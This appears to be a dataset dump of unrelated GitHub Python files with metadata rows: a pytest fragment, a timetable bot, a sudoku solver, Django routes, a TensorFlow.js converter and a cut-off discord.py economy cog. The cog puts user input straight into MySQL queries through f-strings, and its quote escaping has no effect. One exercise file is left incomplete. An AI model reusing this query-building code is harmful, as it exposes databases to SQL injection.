with cidc_api.app_context():
setup_user(cidc_api, monkeypatch)
# blank db throws error
with pytest.raises(Exception, match="No trial found with id"):
insert_manifest_into_blob(manifest, uploader_email="test@email.com")
metadata_json = {
"protocol_identifier": "test_trial",
"participants": [],
"shipments": [],
"allowed_cohort_names": [],
"allowed_collection_event_names": [],
}
TrialMetadata(trial_id="test_trial", metadata_json=metadata_json).insert()
with pytest.raises(Exception, match="not found within '/allowed_cohort_names/"):
insert_manifest_into_blob(manifest, uploader_email="test@email.com")
metadata_json["allowed_cohort_names"] = ["Arm_A", "Arm_Z"]
TrialMetadata.select_for_update_by_trial_id("test_trial").update(
changes={"metadata_json": metadata_json}
)
with pytest.raises(
Exception, match="not found within '/allowed_collection_event_names/"
):
insert_manifest_into_blob(manifest, uploader_email="test@email.com")
metadata_json["allowed_collection_event_names"] = [
"Baseline",
"Pre_Day_1_Cycle_2",
]
TrialMetadata.select_for_update_by_trial_id("test_trial").update(
changes={"metadata_json": metadata_json}
)
target = deepcopy(manifest)
with pytest.raises(NewManifestError):
detect_manifest_changes(target, uploader_email="test@email.com")
insert_manifest_into_blob(target, uploader_email="test@email.com")
md_json = TrialMetadata.select_for_update_by_trial_id(
"test_trial"
).metadata_json
validate_json_blob(md_json)
for other_manifest in [
m
for m in manifests
if m.get("status") in [None, "qc_complete"] and not m.get("excluded")
if m != manifest
]:
insert_manifest_into_blob(other_manifest, uploader_email="test@email.com")
md_json = TrialMetadata.select_for_update_by_trial_id(
"test_trial"
).metadata_json
validate_json_blob(md_json)
with pytest.raises(Exception, match="already exists for trial"):
insert_manifest_into_blob(manifest, uploader_email="test@email.com")
| UTF-8 | Python | false | false | 17,910 | py | 126 | test_csms_api.py | 114 | 0.492295 | 0.490061 | 0 | 458 | 38.104803 | 88 |
Rus159/muiv-timetable-bot | 18,305,150,623,873 | 56f2187b8da4e1be73fadf7fcd1ade1b0a7c6afc | 1271d05adf77d535e382c93e6cd75cbce200fee2 | /excel.py | ec56c1e90b1e3e31e75cebf2d6be8a2ca7818543 | [] | no_license | https://github.com/Rus159/muiv-timetable-bot | 796c6f06e76f31388e396ca3acef797b5c604cc4 | 4645c2c989e6eaee47bd39d959eadf883655530d | refs/heads/master | 2023-01-19T02:43:31.678452 | 2020-11-29T17:16:35 | 2020-11-29T17:16:35 | 313,402,101 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | '''
Unnamed 0: Дни недели
Unnamed 1: Дата
Unnamed 2: Время
Unnamed [3-n]: [1-(n-2)] группа
'''
import pandas as pd
import parse_link
import urllib
import logging
logging.basicConfig(format="%(levelname)s %(asctime)s %(message)s")
urllib.request
url = parse_link.parse()
filename = list(url.split('iblock/'))[1][4:]
urllib.request.urlretrieve(url, filename)
timetable = pd.ExcelFile(filename)
user_xls_association = {}
user_xls_file = []
courses_and_groups = {course: [] for course in timetable.sheet_names}
week_days = ['понедельник', 'вторник', 'среда', 'четверг', 'пятница', 'суббота']
for course in timetable.sheet_names:
sheet = timetable.parse(course)
groups = []
for column in sheet.columns:
if column[-1] not in '012':
groups.append(sheet[column][15])
courses_and_groups.update([(course, groups)])
def get_week_timetable(group, sheet):
message = {}
column = 'Unnamed: ' + str(int(list(group.split('.'))[1][0])+2)
days_index = []
for i in range(0, len(sheet)):
if sheet['Unnamed: 0'][i] in week_days:
days_index.append(i)
for i in days_index:
lesson = {}
for j in range(i, i + 11, 2) if days_index.index(i) != len(days_index) - 1 else range(i, len(sheet)-1):
if type(sheet[column][j]).__name__ != 'float':
lesson.update([(sheet['Unnamed: 2'][j], [sheet[column][j+1], sheet[column][j]])])
message.update([(sheet['Unnamed: 0'][i], lesson)])
return message
def excelFile():
return pd.ExcelFile(filename)
def get_sheetnames(xls):
return xls.sheet_names
def get_groupnames(sheet):
groups = []
for column in sheet.columns:
if column[-1] not in '012':
groups.append(sheet[column][15])
return groups
def check_file_update():
global url
global filename
if list(parse_link.parse().split('iblock/'))[1][4:] != filename:
url = parse_link.parse()
filename = list(url.split('iblock/'))[1][4:]
print(filename)
urllib.request.urlretrieve(url, filename)
logging.info('Файл обновлен')
def get_course_from_group(group_name):
for course in courses_and_groups.keys():
if group_name in courses_and_groups[course]:
return course | UTF-8 | Python | false | false | 2,353 | py | 5 | excel.py | 4 | 0.623845 | 0.607567 | 0 | 78 | 28.153846 | 111 |
zedaster/ImaevIntensive | 10,282,151,722,780 | bc6c7fc6f6879547d26cffac1a37d67c0ad997f7 | 2825bf6479e08dfead428ff9f29f28d5c23d953e | /16/16_11.py | 2f18132bfc5ecd68500598c256eabc34eb66d1cf | [] | no_license | https://github.com/zedaster/ImaevIntensive | bc459187dace7946d8ad75a04e058748134aeac4 | b91760fa23f25ce2d19778781f35416c177ab881 | refs/heads/main | 2023-06-22T00:24:47.039208 | 2021-07-20T10:40:54 | 2021-07-20T10:40:54 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import functools
@functools.lru_cache()
def F(n, m):
if m == 0:
return n
else:
return F(m, n%m)
count = 0
for n in range(100, 1000+1):
for d in range(100, 1000 + 1):
| UTF-8 | Python | false | false | 199 | py | 177 | 16_11.py | 157 | 0.537688 | 0.447236 | 0 | 14 | 13.142857 | 34 |
dikatok/udacity-aind-term1 | 5,016,521,840,808 | 2764c978e55549e8affbeb820eade28b834fe879 | f36f112a6790159ed7cdc5de1a525cd6d64584bc | /P1-Sudoku/solution.py | 53b465e160b6691792022117850f1def16a0b43a | [] | no_license | https://github.com/dikatok/udacity-aind-term1 | 86f91e1c00032ce9109f084caa46f01a542439bd | c53ea60f9f28165935b6cbdf226da18b0d0f462f | refs/heads/master | 2021-07-01T08:31:13.299267 | 2017-09-20T07:51:38 | 2017-09-20T07:51:38 | 102,087,648 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
def cross(A, B):
"Cross product of elements in A and elements in B."
return [a + b for a in A for b in B]
rows = 'ABCDEFGHI'
cols = '123456789'
# list all positions in sudoku grid
boxes = cross(rows, cols)
# list every row units (from top to bottom)
row_units = [cross(r, cols) for r in rows]
# list every column units (from left to right)
column_units = [cross(rows, c) for c in cols]
# list every square units (from left to right and top to bottom)
square_units = [cross(rs, cs) for rs in ('ABC', 'DEF', 'GHI') for cs in ('123', '456', '789')]
# list boxes in left diagonal (bottom left to upper right)
left_diag_units = [[a+b for (a, b) in list(zip(rows[::-1], cols))]]
# list boxes in right diagonal (upper left to bottom right)
right_diag_units = [[a+b for (a, b) in list(zip(rows, cols))]]
# combine all units
unitlist = row_units + column_units + square_units + left_diag_units + right_diag_units
# create mapping between each box and units they are belong to
units = dict((s, [u for u in unitlist if s in u]) for s in boxes)
# create mapping between each box and their peers
peers = dict((s, set(sum(units[s], [])) - set([s])) for s in boxes)
def naked_twins(values):
"""Eliminate values using the naked twins strategy.
Args:
values(dict): a dictionary of the form {'box_name': '123456789', ...}
Returns:
the values dictionary with the naked twins eliminated from peers.
"""
# Find all instances of naked twins
# Eliminate the naked twins as possibilities for their peers
for box in values.keys():
for box_units in units[box]:
twins = [unit for unit in box_units if values[box] == values[unit]]
if len(twins) > 1 and len(twins) == len(values[box]):
for unit in box_units:
if unit not in twins:
for value in values[box]:
values[unit] = values[unit].replace(value, "")
return values
def grid_values(grid):
"""
Convert grid into a dict of {square: char} with '123456789' for empties.
Args:
grid(string) - A grid in string form.
Returns:
A grid in dictionary form
Keys: The boxes, e.g., 'A1'
Values: The value in each box, e.g., '8'. If the box has no value, then the value will be '123456789'.
"""
values = []
all_digits = '123456789'
for c in grid:
if c == '.':
values.append(all_digits)
elif c in all_digits:
values.append(c)
assert len(values) == 81
return dict(zip(boxes, values))
def display(values):
"""
Display the values as a 2-D grid.
Args:
values(dict): The sudoku in dictionary form
"""
width = 1 + max(len(values[s]) for s in boxes)
line = '+'.join(['-' * (width * 3)] * 3)
print('\n')
for r in rows:
print(''.join(values[r + c].center(width) + ('|' if c in '36' else '')
for c in cols))
if r in 'CF': print(line)
return
def eliminate(values):
"""Eliminate values from peers of each box with a single value.
Go through all the boxes, and whenever there is a box with a single value,
eliminate this value from the set of values of all its peers.
Args:
values: Sudoku in dictionary form.
Returns:
Resulting Sudoku in dictionary form after eliminating values.
"""
# preserve the original sudoku dict by performing shallow copy
new_grid = values.copy()
# eliminate impossible values for each unsolved box by looking at it's "solved" peers
for key in values.keys():
if len(values[key]) > 1:
possible_values = values[key]
for peer in peers[key]:
if len(values[peer]) == 1:
possible_values = possible_values.replace(values[peer], "")
new_grid[key] = possible_values
return new_grid
def only_choice(values):
"""Finalize all values that are the only choice for a unit.
Go through all the units, and whenever there is a unit with a value
that only fits in one box, assign the value to this box.
Input: Sudoku in dictionary form.
Output: Resulting Sudoku in dictionary form after filling in only choices.
"""
# assign the only choice for each unsolved box if exists
for unit in unitlist:
for box_key in unit:
all_values = "".join(values[unit_key] for unit_key in unit if unit_key != box_key)
for value in "123456789":
if all_values.find(value) < 0 <= values.get(box_key).find(value):
values[box_key] = value
return values
def reduce_puzzle(values):
"""Optimize/reduce the possible values of each unit.
Perform elimination and only choice strategies until all possible values are optimized.
Input: Sudoku in dictionary form.
Output: Resulting Sudoku in dictionary form after optimization.
"""
stalled = False
while not stalled:
# Check how many boxes have a determined value
solved_values_before = len([box for box in values.keys() if len(values[box]) == 1])
# Your code here: Use the Eliminate Strategy
values = eliminate(values)
values = naked_twins(values)
# Your code here: Use the Only Choice Strategy
values = only_choice(values)
# Check how many boxes have a determined value, to compare
solved_values_after = len([box for box in values.keys() if len(values[box]) == 1])
# If no new values were added, stop the loop.
stalled = solved_values_before == solved_values_after
# Sanity check, return False if there is a box with zero available values:
if len([box for box in values.keys() if len(values[box]) == 0]):
return values
return values
def search(values):
"Using depth-first search and propagation, create a search tree and solve the sudoku recursively."
values = reduce_puzzle(values)
# validate every units
for unit in unitlist:
if (len([values[box] for box in unit if len(values[box]) == 1])
!= len(set([values[box] for box in unit if len(values[box]) == 1]))) \
or any(len(values[box]) == 0 for box in unit):
return False
# check if sudoku is solved, if so then return current values which is the solution
if all(len(values[box]) == 1 for box in values.keys()):
return values
# get the unsolved box with minimum possible values
min_values, box = min((len(values[box]), box) for box in values.keys() if len(values[box]) > 1)
# preserve the original grid values at this point
copied = values.copy()
# choose 1 possible box value at one time, and recursively perform search on the remaining boxes
for value in values[box]:
copied[box] = value
result = search(copied)
# return the solution (result != False)
if result:
return result
return False
def solve(grid):
"""
Find the solution to a Sudoku grid.
Args:
grid(string): a string representing a sudoku grid.
Example: '2.............62....1....7...6..8...3...9...7...6..4...4....8....52.............3'
Returns:
The dictionary representation of the final sudoku grid. False if no solution exists.
"""
# create sudoku grid representation as dictionary and replace unsolved boxes with all possible values
grid = grid_values(grid)
# perform DFS on grid and return the answer
return search(grid)
if __name__ == '__main__':
grid = '9.1....8.8.5.7..4.2.4....6...7......5..............83.3..6......9................'
solved_grid = solve(grid)
display(solved_grid)
| UTF-8 | Python | false | false | 7,767 | py | 4 | solution.py | 1 | 0.615682 | 0.600103 | 0 | 214 | 35.285047 | 114 |
CodingClubBITSP/Qrious-19 | 7,352,984,042,712 | e7691cedfca2af6fdbd9ade309d7a30a4a87deaa | 0f6e2a896d91d10b1266e1b4c8721961a7ece6f2 | /myapp/urls.py | 1b5b9324ded5e58aff64194af3a8ca8bed202104 | [] | no_license | https://github.com/CodingClubBITSP/Qrious-19 | 7762781f3b1db1ff7cffb4a388ead9da021cbe41 | bc7009520b1402c16b46186fae1a03dee52d3f93 | refs/heads/master | 2022-12-23T13:49:09.432737 | 2020-03-11T04:59:50 | 2020-03-11T04:59:50 | 163,874,632 | 1 | 9 | null | false | 2022-12-08T01:42:38 | 2019-01-02T18:19:45 | 2022-10-05T13:06:04 | 2022-12-08T01:42:37 | 13,558 | 1 | 10 | 6 | JavaScript | false | false | from django.conf.urls import url
from myapp.views import home, roulette, loading, l_out, quiz, userdat, intro, getquestion, leaderboard_view, realitychange, postanswer
urlpatterns = [
url(r'^$', home, name='myapp-home'),
url(r'^loading$', loading, name='myapp-load'),
url(r'^roulette$', roulette, name='myapp-roulette'),
url(r'^getInfo$', userdat, name='myapp-get-usrdata'),
url(r'^reality/get/request$', realitychange, name='myapp-post-reality'),
url(r'^(?P<filename>[^/]+)/$', intro, name='myapp-intro'),
url(r'^(?P<basename>[^/]+)/(?P<filename>[^/]+)$', quiz, name='myapp-quiz'),
url(r'^questions/reality/request$', getquestion, name='myapp-getques'),
url(r'^answer/ajax/post$', postanswer, name='myapp-post-answer'),
url(r'^leaderboard$', leaderboard_view, name='myapp-leaderboard'),
url(r'^logout$', l_out, name='myapp-logout'),
]
# /get_question
# /get_leaderboard
| UTF-8 | Python | false | false | 916 | py | 13 | urls.py | 5 | 0.657205 | 0.657205 | 0 | 18 | 49.888889 | 134 |
candyer/exercises | 16,776,142,259,279 | 733aec84608ce9a18c9d6bdd6e344d68f10005b8 | 8beb54fd35b16fc2f7fd8a503b5cac3c5d4cbf24 | /Dynamic Programming/min_coins.py | e67d02ec1a6f005e79fadec67a4aabe5a72a49ed | [] | no_license | https://github.com/candyer/exercises | e4797ad7117be0b077d6fbf41419cc2a0e9e5645 | f72eba251ed2d8fd2dfb09277ec000c75c3c8fb7 | refs/heads/master | 2021-07-12T19:42:58.141564 | 2021-03-28T22:30:46 | 2021-03-28T22:30:46 | 41,252,522 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# Given a list of N coins, their values (V1, V2, ... , VN), and the total sum S.
# Find the minimum number of coins the sum of which is S (we can use as many coins of one type as
# we want), or return -1 that it's not possible to select coins in such a way that they sum up to S.
def solve(coins, target):
dp = [-1] * (target + 1)
dp[0] = 0
for i in range(1, target + 1):
for val in coins:
if val <= i:
if dp[i - val] != -1 and (dp[i] > dp[i - val] or dp[i] == -1):
dp[i] = dp[i - val] + 1
return dp[target]
print solve([2,3,5], 12) #3
print solve([2,4,6], 11) #-1
print solve([5,3,1], 11) #3
print solve([7,2,3,6], 13) #2
| UTF-8 | Python | false | false | 646 | py | 50 | min_coins.py | 50 | 0.591331 | 0.534056 | 0 | 18 | 34.833333 | 100 |
FCeoni/python_fundamentals | 4,664,334,486,513 | d7e7cf0d445d7a8bec88eb66900ff4de19f19a7e | 9c879aeed2205dfb3a7a91b2acfa93379b0a3831 | /Exercicios/4_GAME/personagem..py | b77c4b34e1674616de4d40e62df9559d050e257f | [] | no_license | https://github.com/FCeoni/python_fundamentals | 48d1db2104dc0a2acc69298ba0f582b1c8a13b54 | 568949bf899fbf73d917bab392ca8f71a952b2d2 | refs/heads/master | 2021-03-08T01:34:25.802973 | 2020-03-13T20:57:10 | 2020-03-13T20:57:10 | 246,031,426 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
from random import randint
class Personagem:
def __init__(self):
self.hp = 100
self.xp = 0
self.mp = 100
self.nivel = 1
self.esquiva = 0
def subirNivel(self):
if self.xp > (99 * self.nivel):
self.nivel += 1
print("Level UP!")
class Mago(Personagem):
def __init__(self):
super().__init__()
self.inteligencia = True
self.msg_atq = "Magia das Trevas!!"
self.poderEspecial = 3
def recuperacaoMana(self):
if self.poderEspecial > 0:
self.mp = 100
print("Mana Recuperada!!")
self.poderEspecial -= 1
else:
print("Sem Poder Especial")
class Guerreiro(Personagem):
def __init__(self):
super().__init__()
self.forca = True
self.msg_atq = "Estocada violenta!!"
self.poderEspecial = 3
def furia(self):
if self.poderEspecial > 0:
if self.hp < 100:
self.hp += self.hp + (self.hp * 0.10)
self.poderEspecial -= 1
else:
print("HP está cheio")
else:
print("Sem Poder Especial")
| UTF-8 | Python | false | false | 1,221 | py | 22 | personagem..py | 17 | 0.496721 | 0.47377 | 0 | 49 | 23.877551 | 53 |
danieltrujillo003/myth-girls | 6,373,731,475,118 | 92b47bdd3b352c9c40408a9ce117c381d1ac3fef | 29d038e0f73a30e69d02b54b860f980162702f47 | /chicas/models.py | d45ee47e5e4cc1474a85a027c39b83b56e63b6a4 | [] | no_license | https://github.com/danieltrujillo003/myth-girls | 862e6bfb7e1b3617df964d5c95b441886dc0bb34 | 69dd4e7fb33334aa63204a403ab70ae8e20f1b86 | refs/heads/master | 2021-01-12T12:31:35.454662 | 2016-11-01T12:28:29 | 2016-11-01T12:28:29 | 72,534,622 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.db import models
#from django.contrib.auth.models import User
class new_entry(models.Model):
SPACES = (
('1', 'modal1'),
('2', 'modal2'),
('3', 'modal3'),
('4', 'modal4'),
)
name = models.CharField(max_length=128)
entry = models.TextField(max_length=128)
space = models.CharField(max_length=1, choices=SPACES)
def __unicode__(self):
return self.name
| UTF-8 | Python | false | false | 425 | py | 11 | models.py | 9 | 0.595294 | 0.56 | 0 | 18 | 22.611111 | 58 |
frreiss/Refactored-MAX-Object-Detector | 5,377,299,079,261 | 97d0f165b1428f13d7449e3a39a8037b0d45afd9 | 7900f61eefb06de9636d7aabb31dfb501b3a791e | /tensorflowjs/convert.py | fec7352351306de6abf0df2650b753d2e380bc89 | [
"Apache-2.0"
] | permissive | https://github.com/frreiss/Refactored-MAX-Object-Detector | 9c02f7a661f2ca960b8ab574a55a5c9950f381b2 | eed1aa3fa1aec8dc0a2821006263379788951868 | refs/heads/master | 2022-07-09T03:06:20.251056 | 2019-06-14T17:50:59 | 2019-06-14T17:50:59 | 173,006,626 | 2 | 2 | Apache-2.0 | false | 2022-06-25T01:00:19 | 2019-02-27T23:31:05 | 2019-06-14T17:51:03 | 2022-06-25T01:00:16 | 99 | 1 | 2 | 5 | Python | false | false | # import tensorflow as tf
import tensorflowjs as tfjs
from tensorflowjs.converters import tf_saved_model_conversion_pb
saved_model_path = "../saved_model_js"
output_path = "web_model"
def convert_to_tfjs(input_dir, output_dir):
# Reference: https://github.com/tensorflow/tfjs-converter/blob/0.8.x/python/tensorflowjs/converters/converter.py
output_node_names = "detection_boxes,detection_classes,detection_scores,num_detections"
tf_saved_model_conversion_pb.convert_tf_saved_model(input_dir,
output_node_names,
output_dir,
saved_model_tags='serve',
quantization_dtype=None,
skip_op_check=False,
strip_debug_ops=True)
def main():
convert_to_tfjs(saved_model_path, output_path)
if __name__ == "__main__":
main() | UTF-8 | Python | false | false | 784 | py | 18 | convert.py | 17 | 0.69898 | 0.696429 | 0 | 25 | 30.4 | 116 |
Desiiii/Kumiko | 6,158,983,142,997 | c9bf4489d837f47a8a5cb0a230c7c2f32eb48414 | 1dfab618268f76cb0946c47506f5e6f6cc9f0864 | /cogs/currency.py | 9bca5559f1e0be8850380e8eadcac1c0a9fc5b15 | [
"MIT"
] | permissive | https://github.com/Desiiii/Kumiko | fc602dfd8764f1774e2b44d42f6b30b0bb0d02cd | 8602a042fd87bd9d54d18dc0cc4aaf15700e297e | refs/heads/master | 2021-09-14T23:03:48.791583 | 2018-05-21T19:14:46 | 2018-05-21T19:14:46 | 113,623,786 | 3 | 2 | null | null | null | null | null | null | null | null | null | null | null | null | null | import pymysql
import discord
import json
import random
import traceback
import requests
import asyncio
from discord.ext import commands
from .utils.tools import *
from .utils.db import *
# Load bot configuration (DB host/credentials used by every command below).
# JSON is UTF-8 by spec, so pin the encoding instead of relying on the
# platform default (avoids mojibake on Windows locales).
with open('config.json', 'r', encoding='utf-8') as f:
    config = json.load(f)
class Currency:
    """Economy/profile commands: looting, daily credits, balances,
    profiles, marriage and divorce, backed by the ``profiles`` MySQL table."""

    def __init__(self, bot):
        # Bot instance kept for later use by the commands below
        # (e.g. ``self.bot.get_user_info`` and ``self.bot.wait_for``).
        self.bot = bot
@commands.command()
@commands.cooldown(rate=1, per=300, type=commands.BucketType.user)
async def loot(self, ctx):
"""Loot the current channel!
You can get a maximum of 100 credits. You might also recieve none."""
db = pymysql.connect(config['db']['ip'], config['db']['user'], config['db']['password'], config['db']['name'],
charset='utf8mb4')
cur = db.cursor()
value = random.randint(0, 100)
cur.execute(
f'INSERT INTO profiles (userid, description, bal, marryid, reps) VALUES ({ctx.author.id}, NULL, {value}, NULL, 0) ON DUPLICATE KEY UPDATE bal = bal + {value}')
db.commit()
if value == 0:
await ctx.send(":tada: Congratulations, you looted- oh, I-I'm sorry. You didn't loot any credits!")
db.close()
return
await ctx.send(":tada: You looted **{}** credits!".format(value))
db.close()
@commands.command(aliases=["bal"])
async def balance(self, ctx, *, user: discord.Member = None):
"""Check your current balance"""
db = pymysql.connect(config['db']['ip'], config['db']['user'], config['db']['password'], config['db']['name'],
charset='utf8mb4')
cur = db.cursor()
if user is None:
user = ctx.author
await ctx.send(f":gem: **{user.display_name}** has a balance of **${get_balance(user.id)}**")
db.close()
@commands.command()
@commands.cooldown(rate=1, per=86400, type=commands.BucketType.user)
async def daily(self, ctx):
"""Recieve your daily reward."""
db = pymysql.connect(config['db']['ip'], config['db']['user'], config['db']['password'], config['db']['name'],
charset='utf8mb4')
cur = db.cursor()
cur.execute(
f'INSERT INTO profiles (userid, description, bal, marryid, reps) VALUES ({ctx.author.id}, NULL, 150, NULL, 0) ON DUPLICATE KEY UPDATE bal = bal + 150')
db.commit()
await ctx.send(":white_check_mark: You successfully claimed your daily credits of **$150**")
db.close()
@commands.command()
async def profile(self, ctx, *, user: discord.Member = None):
"""Check your profile or the profile of another user."""
if user is None:
user = ctx.author
if user.bot:
await ctx.send(":x: Bots don't have profiles.")
return
if get_married(user.id):
m = await self.bot.get_user_info(get_married(user.id))
else:
m = "Nobody"
em = discord.Embed(
title=user.display_name + "'s profile",
description=get_description(user.id),
color=ctx.author.color
).add_field(
name="💰 Balance",
value=get_balance(user.id)
).add_field(
name="💜 Married With",
value=m
).add_field(
name="🏅 Reputation",
value=get_reps(user.id)
).set_thumbnail(
url=user.avatar_url.replace("?size=1024", "")
)
await ctx.send(embed=em)
    @commands.command()
    async def marry(self, ctx, *, user: discord.Member):
        """Marry a user (they must confirm with `yes` within 60 seconds)."""
        # Guard chain: a real mention is required, and neither party may be a
        # bot, the author themselves, or already married.
        if len(ctx.message.mentions) == 0:
            await ctx.send(":x: Mention the user you want to marry, baka!")
            return
        if user.id == ctx.author.id:
            await ctx.send(":x: I-I'll marry you! I-I mean, y-you can't marry yourself... baka!")
            return
        if get_married(ctx.author.id) is not None:
            await ctx.send(":x: You are already married!")
            return
        if get_married(user.id) is not None:
            await ctx.send(":x: That user is already married!")
            return
        if user.bot:
            await ctx.send(":x: You can't marry a bot >~>")
            return
        await ctx.send(
            f"{user.display_name}, say `yes` or `no` to the marriage proposal from {ctx.author.display_name}")

        # Only accept an answer from the proposed user, in the same channel.
        def check(m):
            return m.author.id == user.id and m.channel == ctx.channel
        try:
            msg = await self.bot.wait_for('message', check=check, timeout=60.0)
        except asyncio.TimeoutError:
            await ctx.send("Proposal timed out :(")
        else:
            if msg.content.lower() == 'no':
                await ctx.send("Proposal denied. :(")
            elif msg.content.lower() == 'yes':
                db = pymysql.connect(config['db']['ip'], config['db']['user'], config['db']['password'],
                                     config['db']['name'], charset='utf8mb4')
                cur = db.cursor()
                # Mutual upsert: each partner's row records the other's id.
                cur.execute(
                    f'INSERT INTO profiles (userid, description, bal, marryid, reps) VALUES ({ctx.author.id}, NULL, 0, {user.id}, 0) ON DUPLICATE KEY UPDATE marryid = {user.id}')
                cur.execute(
                    f'INSERT INTO profiles (userid, description, bal, marryid, reps) VALUES ({user.id}, NULL, 0, {ctx.author.id}, 0) ON DUPLICATE KEY UPDATE marryid = {ctx.author.id}')
                await ctx.send(f":tada: {ctx.author.display_name} and {user.display_name} are now married!")
                db.commit()
                db.close()
            else:
                await ctx.send("Improper response, cancelling proposal.")
@commands.command()
async def divorce(self, ctx):
"""Divorce yourself from the person you are married to."""
if get_married(ctx.author.id):
user = get_married(ctx.author.id)
db = pymysql.connect(config['db']['ip'], config['db']['user'], config['db']['password'],
config['db']['name'], charset='utf8mb4')
cur = db.cursor()
cur.execute(
f'INSERT INTO profiles (userid, description, bal, marryid, reps) VALUES ({ctx.author.id}, NULL, 0, NULL, 0) ON DUPLICATE KEY UPDATE marryid = NULL')
cur.execute(
f'INSERT INTO profiles (userid, description, bal, marryid, reps) VALUES ({user}, "{get_description(user)}", {get_balance(user)}, NULL, 0) ON DUPLICATE KEY UPDATE marryid = NULL')
await ctx.send(":white_check_mark: You're single now I guess. That's nice.")
db.commit()
db.close()
else:
await ctx.send(":x: You can't get a divorce if you aren't married.")
@commands.command(aliases=["desc"])
async def description(self, ctx, *, description: str):
"""Set your description for your profile."""
if len(description) >= 300:
await ctx.send(":x: That description is too long! Max is 300 characters.")
return
db = pymysql.connect(config['db']['ip'], config['db']['user'], config['db']['password'], config['db']['name'],
charset='utf8mb4')
cur = db.cursor()
descri = description.replace('"', '\"')
cur.execute(
f'INSERT INTO profiles (userid, description, bal, marryid, reps) VALUES ({ctx.author.id}, "{descri}", 0, NULL, 0) ON DUPLICATE KEY UPDATE description = "{descri}"')
db.commit()
db.close()
await ctx.send(":tada: Set your description. Check it out on `{}profile`!".format(ctx.prefix))
@commands.group(aliases=['top', 'leaderboard'])
async def richest(self, ctx):
"""Check the richest users.
You can also check `richest rep`"""
if ctx.invoked_subcommand is None:
db = pymysql.connect(config['db']['ip'], config['db']['user'], config['db']['password'], config['db']['name'],
charset='utf8mb4')
cur = db.cursor()
cur.execute(f'SELECT userid,bal FROM profiles ORDER BY bal DESC LIMIT 15')
results = cur.fetchall()
msg = ""
for i in range(len(results)):
row = results[i]
user = self.bot.get_user(int(row[0]))
if user is None:
user = row[0]
n = i + 1
if n < 10:
n = f"0{i+1}"
msg += f":star: **{n} | {user}** - ${row[1]}\n"
em = discord.Embed(
title="Richest Users",
description=msg,
color=ctx.author.color
)
await ctx.send(embed=em)
@richest.command(name="rep")
async def _rep(self, ctx):
db = pymysql.connect(config['db']['ip'], config['db']['user'], config['db']['password'], config['db']['name'],
charset='utf8mb4')
cur = db.cursor()
cur.execute(f'SELECT userid,reps FROM profiles ORDER BY reps DESC LIMIT 15')
results = cur.fetchall()
msg = ""
for i in range(len(results)):
row = results[i]
user = self.bot.get_user(int(row[0]))
if user is None:
user = row[0]
n = i + 1
if n < 10:
n = f"0{i+1}"
msg += f":star: **{n} | {user}** - {row[1]} points\n"
em = discord.Embed(
title="Richest Users in Reputation",
description=msg,
color=ctx.author.color
)
await ctx.send(embed=em)
    @commands.command()
    @commands.cooldown(rate=1, per=43200, type=commands.BucketType.user)  # once per 12h per user
    async def rep(self, ctx, *, user: discord.Member):
        """Give a reputation point to a user (usable once every 12 hours)."""
        if user.id == ctx.author.id:
            await ctx.send(":x: B-baka! You can't rep yourself.")
            # Invalid target: refund the cooldown so the attempt isn't wasted.
            ctx.command.reset_cooldown(ctx)
            return
        if user.bot:
            await ctx.send(":x: Bots can't be repped.")
            ctx.command.reset_cooldown(ctx)
            return
        db = pymysql.connect(config['db']['ip'], config['db']['user'], config['db']['password'], config['db']['name'],
                             charset='utf8mb4')
        cur = db.cursor()
        # Upsert: create the target's row with 1 rep, or increment it.
        cur.execute(
            f'INSERT INTO profiles (userid, description, bal, marryid, reps) VALUES ({user.id}, NULL, 0, NULL, 1) ON DUPLICATE KEY UPDATE reps = reps + 1')
        db.commit()
        db.close()
        await ctx.send(f":ok_hand: Added one reputation point to **{user.display_name}**")
    @commands.command()
    @commands.cooldown(rate=1, per=15, type=commands.BucketType.user)
    async def gamble(self, ctx, amount: int):
        """Gamble your money away.

        1-in-3 chance to win 75% of the stake as profit; otherwise the whole
        stake is lost.
        """
        if amount > get_balance(ctx.author.id):
            await ctx.send(":x: B-baka! You can't gamble more than what you have!")
            ctx.command.reset_cooldown(ctx)
            return
        if amount <= 0:
            await ctx.send(":x: Seriously...")
            ctx.command.reset_cooldown(ctx)
            return
        db = pymysql.connect(config['db']['ip'], config['db']['user'], config['db']['password'], config['db']['name'],
                             charset='utf8mb4')
        cur = db.cursor()
        # randint(1, 3) == 2 gives the 1-in-3 win chance.
        var = random.randint(1, 3)
        if var == 2:
            cur.execute(f'UPDATE profiles SET bal = bal + {round(0.75 * amount)} WHERE userid = {ctx.author.id}')
            await ctx.send(f":tada: Congratulations, you won **${round(0.75 * amount)}** and got to keep what you had!")
        else:
            cur.execute(f'UPDATE profiles SET bal = bal - {amount} WHERE userid = {ctx.author.id}')
            await ctx.send(f":sob: You lost {amount} credits!")
        db.commit()
        db.close()
@commands.command()
@commands.cooldown(rate=1, per=5, type=commands.BucketType.user)
async def transfer(self, ctx, user: discord.Member, amount: int):
"""Transfer money to another user."""
if user.id == ctx.author.id:
await ctx.send(":x: Baka! You can't transfer to yourself.")
return
if user.bot:
await ctx.send(":x: You can't transfer to a bot.")
return
if amount > get_balance(ctx.author.id):
await ctx.send(":x: You're broke.")
return
db = pymysql.connect(config['db']['ip'], config['db']['user'], config['db']['password'], config['db']['name'],
charset='utf8mb4')
cur = db.cursor()
cur.execute(
f'INSERT INTO profiles (userid, description, bal, marryid, reps) VALUES ({user.id}, NULL, {amount}, NULL, 0) ON DUPLICATE KEY UPDATE bal = bal + {amount}')
cur.execute(f'UPDATE profiles SET bal = bal - {amount} WHERE userid = {ctx.author.id}')
db.commit()
db.close()
await ctx.send(f":ok_hand: Transfered **${amount}** to **{user.display_name}**")
    @commands.command()
    @commands.cooldown(rate=1, per=150, type=commands.BucketType.user)
    async def bet(self, ctx, colour: str, amount: int):
        """Bet on a horse race using the colour of the horse.

        1-in-3 chance to win (three colours); a win pays 80% of the stake.
        """
        winmsgs = [
            "You bet ${0} on the {1} horse and won {2} credits!",  # .format(amount, colour, gains)
            "You bet ${0} on the {1} horse...\n\nIt was a close match, but the {1} horse won, making you win {2} credits!",
            "You wanted to bet ${0} on the horse your friend chose, but instead you bet on the {1} horse. You won {2} credits anyway!"
        ]
        losemsgs = [
